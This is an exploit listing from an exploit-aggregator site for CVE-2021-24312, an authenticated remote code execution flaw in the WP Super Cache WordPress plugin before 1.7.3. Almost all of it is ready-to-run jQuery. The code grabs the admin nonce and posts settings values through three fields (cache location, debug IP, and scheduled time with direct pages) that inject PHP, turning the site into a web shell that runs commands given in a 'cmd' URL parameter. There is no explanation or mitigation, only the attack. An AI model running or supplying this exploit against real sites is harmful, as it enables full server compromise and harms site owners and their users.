Exploit for WP Super Cache < 1.7.3 - Authenticated Remote Code Execution CVE-2021-24312

Name: Exploit for WP Super Cache < 1.7.3 - Authenticated Remote Code Execution CVE-2021-24312
Rating: 5 (120 reviews)
2021-05-14 | CVSS 6.5
## https://sploitus.com/exploit?id=WPEX-ID:2142C3D3-9A7F-4E3C-8776-D469A355D62F
//Exploit $cache_path

url = 'http://wp.lab/wordpress/wp-admin/options-general.php?page=wpsupercache&tab=settings';
jQuery.get(url,function(e){
  jQuery.post(url,{
      "action": "scupdates",
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "wp_cache_enabled": 1,
      "wp_cache_location": "/tmp/\n$cache_path\necho exec($_GET[cmd]);#"
  })
  console.log('SET!');
}).then(()=>{

  jQuery.get(url,function(e){
      jQuery.post(url,{
          "action": "scupdates",
          "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
          "wp_cache_enabled": 1,
          "wp_cache_location": "./"
      })
  });
  console.log('EXPLOIT!');
});


//Exploit $wp_cache_debug_ip, $wp_super_cache_front_page_text

url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=debug';	
jQuery.get(url,function(e){
  jQuery.post(url,{
      "wp_cache_debug": 1,
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "wp_cache_debug_ip": "/tmp/\n$wp_cache_debug_ip\necho exec($_GET[cmd]);#"
      //"wp_super_cache_front_page_text": "/tmp/\n$wp_super_cache_front_page_text\necho exec($_GET[cmd]);#"
  })
  console.log('SET!');
}).then(()=>{

  jQuery.get(url,function(e){
      jQuery.post(url,{
      "wp_cache_debug": 1,
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "wp_cache_debug_ip": "1"
      //"wp_super_cache_front_page_text": "1"
      })
  });
  console.log('EXPLOIT!');
});


//Exploit $cache_scheduled_time + $cached_direct_pages

url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=settings';	
jQuery.get(url,function(e){
  jQuery.post(url,{
      "action": "scupdates",
      "wp_cache_enabled": "1",
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1]
  })
  console.log('SET1!');
}).then(()=>{

  jQuery.get(url,function(e){
      jQuery.post(url,{
      "action":"expirytime",
      "cache_scheduled_time": "\n`:00",
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "new_direct_page":"`;echo`$_GET[cmd]`;#"
      })
  }).then(()=>{
    
      console.log('EXPLOIT!');
      jQuery.get(url,function(e){
          jQuery.post(url,{
          "action":"expirytime",
          "cache_scheduled_time": "00:00",
          "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
          "new_direct_page":"`;echo`$_GET[cmd]`;#"
          })
      })

  });
  console.log('SET2!');
});